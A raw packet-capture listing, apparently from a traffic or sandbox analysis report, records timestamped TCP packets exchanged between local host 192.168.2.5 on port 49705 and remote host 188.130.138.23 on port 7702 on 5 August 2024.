                        Aug 5, 2024 05:54:24.483953953 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.483962059 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.483974934 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.483987093 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.483989000 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.484004974 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.484035969 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.484164953 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.484179974 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.484191895 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.484205008 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.484208107 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.484216928 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.484239101 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.484244108 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.484252930 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.484260082 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.484266043 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.484271049 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.484280109 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.484282970 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.484302044 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.484313965 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.484338045 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.484396935 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.484411001 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.484424114 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.484436989 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.484445095 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.484450102 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.484458923 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.484464884 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.484478951 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.484492064 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.484499931 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.484512091 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.484513998 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.484527111 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.484538078 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.484539986 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.484550953 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.484555006 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.484565973 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.484569073 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.484581947 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.484587908 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.484606981 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.484615088 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.484622002 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.484631062 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.484635115 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.484648943 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.484652996 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.484663010 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.484675884 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.484675884 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.484688997 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.484702110 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.484704018 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.484714985 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.484723091 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.484729052 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.484741926 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.484765053 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.484785080 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.488429070 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.488442898 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.488455057 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.488466978 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.488480091 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.488498926 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.488501072 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.488516092 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.488521099 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.488529921 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.488548040 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.488548994 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.488563061 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.488564014 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.488575935 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.488589048 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.488589048 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.488604069 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.488610029 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.488616943 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.488631010 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.488631964 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.488643885 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.488651991 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.488657951 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.488666058 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.488672018 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.488684893 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.488696098 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.488698006 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.488712072 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.488732100 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.488754988 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.489227057 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489243984 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489257097 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489269972 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489275932 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.489283085 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489296913 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489315987 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489327908 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.489329100 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489351034 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489367008 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489367008 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.489381075 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489382982 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.489387989 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489402056 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489403009 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.489414930 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489428043 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489442110 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489454985 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489459991 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.489465952 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489479065 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489485979 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.489492893 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489500046 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.489506960 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489512920 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.489521027 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489536047 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489543915 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.489551067 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489564896 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489566088 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.489579916 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.489579916 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489595890 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489598989 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.489609003 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489623070 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489623070 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.489636898 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489648104 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.489650011 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489662886 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.489664078 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489679098 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489690065 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.489691973 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489706039 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489718914 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.489720106 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489732027 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.489733934 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489747047 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489759922 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489759922 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.489772081 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489778996 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.489787102 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489799976 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489804983 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.489814043 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489819050 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.489826918 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489826918 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.489840984 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489855051 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489856958 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.489867926 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489876032 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.489881992 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489897013 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489901066 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.489909887 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489914894 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.489924908 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489933014 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.489940882 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489954948 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489968061 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489969015 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.489969015 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.489981890 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.489993095 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.489995003 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.490009069 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.490016937 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.490022898 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.490036964 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.490046024 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.490046024 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.490050077 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.490062952 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.490061998 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.490078926 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.490092039 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.490092993 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.490104914 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.490117073 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.490118980 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.490138054 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.490151882 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.493169069 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.493186951 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.493199110 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.493211985 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.493225098 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.493227959 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.493237019 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.493249893 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.493261099 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.493262053 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.493274927 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.493280888 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.493288994 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.493300915 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.493314981 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.493314981 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.493329048 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.493330956 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.493343115 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.493344069 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.493355989 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.493357897 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.493367910 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.493370056 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.493383884 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.493391037 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.493397951 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.493412018 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.493412971 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.493429899 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.493433952 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.493447065 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.493453026 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.493459940 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.493470907 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.493506908 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494024992 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494040966 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494054079 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494066954 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494075060 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494081020 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494095087 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494098902 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494107962 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494113922 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494121075 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494132996 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494139910 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494146109 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494158030 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494158983 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494173050 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494178057 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494188070 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494191885 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494200945 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494203091 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494214058 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494226933 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494240046 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494244099 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494244099 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494252920 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494260073 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494266033 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494277954 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494280100 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494293928 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494297028 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494307995 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494311094 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494322062 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494330883 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494334936 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494349003 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494355917 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494364023 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494369984 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494379997 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494379997 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494395018 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494407892 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494407892 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494422913 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494422913 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494436026 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494440079 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494451046 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494455099 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494462967 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494474888 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494479895 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494488955 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494496107 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494503021 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494513988 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494515896 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494529963 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494530916 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494544029 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494546890 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494558096 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494568110 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494571924 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494586945 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494587898 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494601011 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494607925 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494623899 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494645119 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494738102 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494754076 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494765997 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494777918 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494787931 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494791031 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494803905 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494805098 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494817019 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494827032 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494829893 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494843960 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494847059 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494856119 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494869947 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494872093 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494887114 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494894981 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494901896 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494914055 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494916916 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494926929 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494937897 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494940996 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494955063 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494962931 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494970083 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494981050 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.494982958 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494996071 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.494996071 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.495011091 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.495018005 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.495054007 CEST497057702192.168.2.5188.130.138.23
